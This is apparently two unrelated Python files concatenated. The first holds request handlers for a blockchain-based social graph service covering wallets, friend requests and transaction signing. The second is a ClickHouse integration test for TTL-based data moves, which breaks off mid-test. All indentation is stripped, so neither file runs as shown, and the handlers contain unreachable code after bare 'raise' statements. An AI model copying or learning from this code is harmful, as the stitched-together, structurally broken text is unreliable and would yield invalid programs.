def get_base_graph(self):
self.bulletin_secret = self.get_query_argument('bulletin_secret').replace(' ', '+')
if self.request.body:
ids = json.loads(self.request.body.decode('utf-8')).get('ids')
else:
ids = []
try:
key_or_wif = self.get_secure_cookie('key_or_wif').decode()
except:
key_or_wif = None
return Graph(self.config, self.config.mongo, self.bulletin_secret, ids, key_or_wif)
# TODO: should have a self.render here instead, not sure what is supposed to be returned here
class GraphInfoHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
self.render_as_json(graph.to_dict())
class GraphRIDWalletHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
config = self.config
address = self.get_query_argument('address')
bulletin_secret = self.get_query_argument('bulletin_secret').replace(' ', "+")
amount_needed = self.get_query_argument('amount_needed', None)
if amount_needed:
amount_needed = int(amount_needed)
rid = TU.generate_rid(config, bulletin_secret)
unspent_transactions = [x for x in BU().get_wallet_unspent_transactions(address)]
spent_txn_ids = []
for x in unspent_transactions:
spent_txn_ids.extend([y['id'] for y in x['inputs']])
unspent_fastgraph_transactions = [x for x in BU().get_wallet_unspent_fastgraph_transactions(address) if x['id'] not in spent_txn_ids]
spent_fastgraph_ids = []
for x in unspent_fastgraph_transactions:
spent_fastgraph_ids.extend([y['id'] for y in x['inputs']])
regular_txns = []
txns_for_fastgraph = []
chain_balance = 0
fastgraph_balance = 0
for txn in unspent_transactions + unspent_fastgraph_transactions:
if 'signatures' in txn and txn['signatures']:
fastgraph = FastGraph.from_dict(0, txn)
origin_fasttrack = fastgraph.get_origin_relationship(rid)
if origin_fasttrack or (('rid' in txn and txn['rid'] == rid) or txn.get('requester_rid') == rid or txn.get('requested_rid') == rid):
txns_for_fastgraph.append(txn)
for output in txn['outputs']:
if output['to'] == address:
fastgraph_balance += int(output['value'])
else:
regular_txns.append(txn)
for output in txn['outputs']:
if output['to'] == address:
chain_balance += int(output['value'])
elif 'dh_public_key' in txn and txn['dh_public_key'] and (('rid' in txn and txn['rid'] == rid) or txn.get('requester_rid') == rid or txn.get('requested_rid') == rid):
txns_for_fastgraph.append(txn)
for output in txn['outputs']:
if output['to'] == address:
fastgraph_balance += int(output['value'])
else:
regular_txns.append(txn)
for output in txn['outputs']:
if output['to'] == address:
chain_balance += int(output['value'])
wallet = {
'chain_balance': chain_balance,
'fastgraph_balance': fastgraph_balance,
'balance': fastgraph_balance + chain_balance,
'unspent_transactions': regular_txns,
'txns_for_fastgraph': txns_for_fastgraph
}
self.render_as_json(wallet, indent=4)
class RegistrationHandler(BaseHandler):
async def get(self):
data = {
'bulletin_secret': self.config.bulletin_secret,
'username': self.config.username,
'callbackurl': self.config.callbackurl,
'to': self.config.address
}
self.render_as_json(data)
class GraphTransactionHandler(BaseGraphHandler):
async def get(self):
rid = self.request.args.get('rid')
if rid:
transactions = BU().get_transactions_by_rid(rid, self.config.bulletin_secret, rid=True, raw=True)
else:
transactions = []
self.render_as_json(list(transactions))
async def post(self):
self.get_base_graph() # TODO: did this to set bulletin_secret, refactor this
items = json.loads(self.request.body.decode('utf-8'))
if not isinstance(items, list):
items = [items, ]
else:
items = [item for item in items]
transactions = []
for txn in items:
transaction = Transaction.from_dict(BU().get_latest_block()['index'], txn)
try:
transaction.verify()
except InvalidTransactionException:
await self.config.mongo.async_db.failed_transactions.insert_one({
'exception': 'InvalidTransactionException',
'txn': txn
})
print('InvalidTransactionException')
return 'InvalidTransactionException', 400
except InvalidTransactionSignatureException:
print('InvalidTransactionSignatureException')
await self.config.mongo.async_db.failed_transactions.insert_one({
'exception': 'InvalidTransactionSignatureException',
'txn': txn
})
return 'InvalidTransactionSignatureException', 400
except MissingInputTransactionException:
pass
except:
raise
print('uknown error')
return 'uknown error', 400
transactions.append(transaction)
for x in transactions:
await self.config.mongo.async_db.miner_transactions.insert_one(x.to_dict())
try:
self.config.push_service.do_push(x.to_dict(), self.bulletin_secret, self.app_log)
except Exception as e:
print(e)
print('do_push failed')
txn_b = TxnBroadcaster(self.config)
await txn_b.txn_broadcast_job(transaction)
return self.render_as_json(items)
class CreateRelationshipHandler(BaseHandler):
async def post(self):
config = self.config
mongo = self.config.mongo
kwargs = json.loads(self.request.body.decode('utf-8'))
bulletin_secret = kwargs.get('bulletin_secret', '')
username = kwargs.get('username', '')
to = kwargs.get('to', '')
if not bulletin_secret:
return 'error: "bulletin_secret" missing', 400
if not username:
return 'error: "username" missing', 400
if not to:
return 'error: "to" missing', 400
rid = TU.generate_rid(config, bulletin_secret)
dup = mongo.db.blocks.find({'transactions.rid': rid})
if dup.count():
found_a = False
found_b = False
for txn in dup:
if txn['public_key'] == config.public_key:
found_a = True
if txn['public_key'] != config.public_key:
found_b = True
if found_a and found_b:
return json.dumps({"success": False, "status": "Already added"})
miner_transactions = mongo.db.miner_transactions.find()
mtxn_ids = []
for mtxn in miner_transactions:
for mtxninput in mtxn['inputs']:
mtxn_ids.append(mtxninput['id'])
checked_out_txn_ids = mongo.db.checked_out_txn_ids.find()
for mtxn in checked_out_txn_ids:
mtxn_ids.append(mtxn['id'])
a = os.urandom(32).decode('latin1')
dh_public_key = scalarmult_base(a).encode('latin1').hex()
dh_private_key = a.encode('latin1').hex()
transaction = TransactionFactory(
block_height=BU().get_latest_block()['index'],
bulletin_secret=bulletin_secret,
username=username,
fee=0.00,
public_key=config.public_key,
dh_public_key=dh_public_key,
private_key=config.private_key,
dh_private_key=dh_private_key,
outputs=[
{
'to': to,
'value': 0
}
]
)
mongo.db.miner_transactions.insert(transaction.transaction.to_dict())
"""
# TODO: integrate new socket/peer framework for transmitting txns
job = Process(target=TxnBroadcaster.txn_broadcast_job, args=(transaction.transaction,))
job.start()
"""
self.render_as_json({"success": True})
class GraphSentFriendRequestsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_sent_friend_requests()
self.render_as_json(graph.to_dict())
class GraphFriendRequestsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_friend_requests()
self.render_as_json(graph.to_dict())
class GraphFriendsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
self.render_as_json(graph.to_dict())
class GraphPostsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_posts()
self.render_as_json(graph.to_dict())
class GraphMessagesHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
await graph.get_messages()
self.render_as_json(graph.to_dict())
class GraphGroupMessagesHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_group_messages()
self.render_as_json(graph.to_dict())
class GraphNewMessagesHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_new_messages()
self.render_as_json(graph.to_dict())
class GraphCommentsHandler(BaseGraphHandler):
async def post(self):
graph = self.get_base_graph()
graph.get_comments()
self.render_as_json(graph.to_dict())
class GraphReactsHandler(BaseGraphHandler):
async def post(self):
graph = self.get_base_graph()
graph.get_reacts()
self.render_as_json(graph.to_dict())
class SearchHandler(BaseHandler):
async def get(self):
config = self.config
phrase = self.get_query_argument('phrase', None)
requester_rid = self.get_query_argument('requester_rid', None)
if not phrase and not requester_rid:
return 'phrase required', 400
bulletin_secret = self.get_query_argument('bulletin_secret').replace(' ', '+')
if not bulletin_secret:
return 'bulletin_secret required', 400
my_bulletin_secret = config.get_bulletin_secret()
if requester_rid:
friend = [x for x in GU().search_rid(requester_rid)][0]
requester_rid = friend['rid']
rids = sorted([str(my_bulletin_secret), str(bulletin_secret)], key=str.lower)
requested_rid = hashlib.sha256(rids[0].encode() + rids[1].encode()).hexdigest()
else:
rids = sorted([str(my_bulletin_secret), str(bulletin_secret)], key=str.lower)
requester_rid = hashlib.sha256(rids[0].encode() + rids[1].encode()).hexdigest()
friend = [x for x in GU().search_username(phrase)][0]
requested_rid = friend['rid']
if friend:
to = [x['to'] for x in friend['outputs'] if x['to'] != config.address][0]
else:
return '{}', 404
self.render_as_json({
'bulletin_secret': friend['relationship']['their_bulletin_secret'],
'requested_rid': requested_rid,
'requester_rid': requester_rid,
'to': to,
'username': friend['relationship']['their_username']
})
class SignRawTransactionHandler(BaseHandler):
async def post(self):
config = self.config
mongo = self.config.mongo
body = json.loads(self.request.body.decode('utf-8'))
try:
fg = FastGraph.from_dict(0, body.get('txn'), raw=True)
fg.verify()
except:
raise
return 'invalid transaction', 400
res = mongo.db.signed_transactions.find_one({'hash': body.get('hash')})
if res:
return 'no', 400
try:
rid = TU.generate_rid(config, body.get('bulletin_secret'))
my_entry_for_relationship = GU().get_transaction_by_rid(rid, config.wif, rid=True, my=True, public_key=config.public_key)
their_entry_for_relationship = GU().get_transaction_by_rid(rid, rid=True, raw=True, theirs=True, public_key=config.public_key)
verified = verify_signature(
base64.b64decode(body.get('bulletin_secret')),
my_entry_for_relationship['relationship']['their_username'].encode(),
bytes.fromhex(their_entry_for_relationship['public_key'])
)
if not verified:
return 'no', 400
verified = verify_signature(
base64.b64decode(body.get('id')),
body.get('hash').encode('utf-8'),
bytes.fromhex(their_entry_for_relationship['public_key'])
)
address = str(P2PKHBitcoinAddress.from_pubkey(bytes.fromhex(their_entry_for_relationship['public_key'])))
found = False
for x in BU().get_wallet_unspent_transactions(address, [body.get('input')]):
if body.get('input') == x['id']:
found = True
if not found:
for x in BU().get_wallet_unspent_fastgraph_transactions(address):
if body.get('input') == x['id']:
found = True
if found:
signature = mongo.db.signed_transactions.find_one({
'input': body.get('input'),
'txn.public_key': body['txn']['public_key']
})
if signature:
already_spent = mongo.db.fastgraph_transactions.find_one({
'txn.inputs.id': body['input'],
'txn.public_key': body['txn']['public_key']
})
if already_spent:
self.set_status(400)
self.write('already spent!')
self.finish()
return True
else:
signature['txn']['signatures'] = [signature['signature']]
fastgraph = FastGraph.from_dict(0, signature['txn'])
try:
fastgraph.verify()
except Exception as e:
raise
return 'did not verify', 400
result = mongo.db.fastgraph_transactions.find_one({
'txn.hash': fastgraph.hash
})
if result:
return 'duplicate transaction found', 400
spent_check = mongo.db.fastgraph_transactions.find_one({
'txn.inputs.id': {'$in': [x.id for x in fastgraph.inputs]}
})
if spent_check:
return 'already spent input', 400
fastgraph.save()
else:
return 'no transactions with this input found', 400
if verified:
transaction_signature = TU.generate_signature_with_private_key(config.private_key, body.get('hash'))
signature = {
'signature': transaction_signature,
'hash': body.get('hash'),
'bulletin_secret': body.get('bulletin_secret'),
'input': body.get('input'),
'id': body.get('id'),
'txn': body.get('txn')
}
mongo.db.signed_transactions.insert(signature)
if '_id' in signature:
del signature['_id']
self.render_as_json(signature, indent=4)
else:
return 'no', 400
except Exception as e:
raise
self.render_as_json({
'status': 'error',
'msg': e
})
class FastGraphHandler(BaseGraphHandler):
async def post(self):
# after the necessary signatures are gathered, the transaction is sent here.
mongo = self.config.mongo
graph = self.get_base_graph()
fastgraph = json.loads(self.request.body.decode('utf-8'))
fastgraph = FastGraph.from_dict(0, fastgraph)
try:
fastgraph.verify()
except Exception as e:
raise
return 'did not verify', 400
result = mongo.db.fastgraph_transactions.find_one({
'txn.hash': fastgraph.hash
})
if result:
return 'duplicate transaction found', 400
spent_check = mongo.db.fastgraph_transactions.find_one({
'public_key': fastgraph.public_key,
'txn.inputs.id': {'$in': [x.id for x in fastgraph.inputs]}
})
if spent_check:
return 'already spent input', 400
fastgraph.save()
# TODO: use new peer framework to broadcast fastgraph transactions
#fastgraph.broadcast()
self.render_as_json(fastgraph.to_dict())
try:
await self.config.push_service.do_push(fastgraph.to_dict(), self.bulletin_secret, self.app_log)
except Exception as e:
self.app_log.error(e)
# these routes are placed in the order of operations for getting started.
GRAPH_HANDLERS = [
(r'/yada_config.json', GraphConfigHandler), # first the config is requested
(r'/get-graph-info', GraphInfoHandler), # then basic graph info is requested. Giving existing relationship information, if present.
(r'/get-graph-wallet', GraphRIDWalletHandler), # request balance and UTXOs
(r'/register', RegistrationHandler), # if a relationship is not present, we "register." client requests information necessary to generate a friend request transaction
(r'/transaction', GraphTransactionHandler), # first the client submits their friend request transaction.
(r'/create-relationship', CreateRelationshipHandler), # this generates and submits an friend accept transaction. You're done registering once these are on the blockchain.
(r'/get-graph-sent-friend-requests', GraphSentFriendRequestsHandler), # get all friend requests I've sent
(r'/get-graph-friend-requests', GraphFriendRequestsHandler), # get all friend requests sent to me
(r'/get-graph-friends', GraphFriendsHandler), # get client/server relationship. Same as get-graph-info, but here for symantic purposes
(r'/get-graph-posts', GraphPostsHandler), # get posts from friends that are mutual friends of client/server
(r'/get-graph-messages', GraphMessagesHandler), # get messages from friends
(r'/get-graph-new-messages', GraphNewMessagesHandler), # get new messages that are newer than a given timestamp
(r'/get-graph-reacts', GraphReactsHandler), # get reacts for posts and comments
(r'/get-graph-comments', GraphCommentsHandler), # get comments for posts
(r'/search', SearchHandler), # search by username for friend of server. Server provides necessary information to generate friend request transaction, just like /register for the server.
(r'/sign-raw-transaction', SignRawTransactionHandler), # server signs the client transaction
(r'/post-fastgraph-transaction', FastGraphHandler), # fastgraph transaction is submitted by client
]
|
test.py
|
import json
import pytest
import random
import re
import string
import threading
import time
from multiprocessing.dummy import Pool
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def get_random_string(length):
symbols = bytes(string.ascii_uppercase + string.digits)
result_list = bytearray([0])*length
for i in range(length):
result_list[i] = random.choice(symbols)
return str(result_list)
def get_used_disks_for_table(node, table_name, partition=None):
if partition is None:
suffix = ""
else:
suffix = "and partition='{}'".format(partition)
return node.query("""
SELECT disk_name
FROM system.parts
WHERE table == '{name}' AND active=1 {suffix}
ORDER BY modification_time
""".format(name=table_name, suffix=suffix)).strip().split('\n')
def check_used_disks_with_retry(node, table_name, expected_disks, retries):
for _ in range(retries):
used_disks = get_used_disks_for_table(node, table_name)
if set(used_disks) == expected_disks:
return True
time.sleep(0.5)
return False
@pytest.mark.parametrize("name,engine,alter", [
("mt_test_rule_with_invalid_destination","MergeTree()",0),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",0),
("mt_test_rule_with_invalid_destination","MergeTree()",1),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",1),
])
def test_rule_with_invalid_destination(started_cluster, name, engine, alter):
try:
def get_command(x, policy):
x = x or ""
if alter and x:
return """
ALTER TABLE {name} MODIFY TTL {expression}
""".format(expression=x, name=name)
else:
return """
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
{expression}
SETTINGS storage_policy='{policy}'
""".format(expression=x, name=name, engine=engine, policy=policy)
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'jbod1'", "only_jbod2"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'external'", "only_jbod2"))
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_do_not_work', '1')",0),
("mt_test_inserts_to_disk_work","MergeTree()",1),
("replicated_mt_test_inserts_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_work', '1')",1),
])
def test_inserts_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
try:
node1.query("DROP TABLE IF EXISTS {}".format(name))
except:
pass
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_do_not_work', '1')",0),
("mt_test_moves_to_disk_work","MergeTree()",1),
("replicated_mt_test_moves_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_work', '1')",1),
])
def test_moves_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 12
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_volume_work","MergeTree()"),
("replicated_mt_test_moves_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_volume_work', '1')"),
])
def test_moves_to_volume_work(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for p in range(2):
data = [] # 10MB in total
for i in range(5):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {'jbod1', 'jbod2'}
wait_expire_1_thread.join()
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_volume_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_volume_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_do_not_work', '1')",0),
("mt_test_inserts_to_volume_work","MergeTree()",1),
("replicated_mt_test_inserts_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_work', '1')",1),
])
def test_inserts_to_volume_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {name}".format(name=name))
for p in range(2):
data = [] # 20MB in total
for i in range(10):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "20"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_disk_eventually_work","MergeTree()"),
("replicated_mt_test_moves_to_disk_eventually_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_eventually_work', '1')"),
])
def test_moves_to_disk_eventually_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("DROP TABLE {}".format(name_temp))
time.sleep(2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
def test_replicated_download_ttl_info(started_cluster):
name = "test_replicated_ttl_info"
engine = "ReplicatedMergeTree('/clickhouse/test_replicated_download_ttl_info', '{replica}')"
try:
for i, node in enumerate((node1, node2), start=1):
node.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {}".format(name))
node2.query("INSERT INTO {} (s1, d1) VALUES ('{}', toDateTime({}))".format(name, get_random_string(1024 * 1024), time.time()-100))
assert set(get_used_disks_for_table(node2, name)) == {"external"}
time.sleep(1)
assert node1.query("SELECT count() FROM {}".format(name)).splitlines() == ["1"]
assert set(get_used_disks_for_table(node1, name)) == {"external"}
finally:
for node in (node1, node2):
try:
node.query("DROP TABLE IF EXISTS {}".format(name))
except:
continue
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_merges_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_merges_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_do_not_work', '1')",0),
("mt_test_merges_to_disk_work","MergeTree()",1),
("replicated_mt_test_merges_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_work', '1')",1),
])
def test_merges_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 16MB in total
for i in range(8):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
node1.query("SYSTEM START MERGES {}".format(name))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "16"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_merges_with_full_disk_work","MergeTree()"),
("replicated_mt_test_merges_with_full_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_with_full_disk_work', '1')"),
])
def test_merges_with_full_disk_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 12MB in total
for i in range(6):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"} # Merged to the same disk against the rule.
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "12"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_after_merges_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_after_merges_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_do_not_work', '1')",0),
("mt_test_moves_after_merges_work","MergeTree()",1),
("replicated_mt_test_moves_after_merges_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_work', '1')",1),
])
def test_moves_after_merges_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 14MB in total
for i in range(7):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
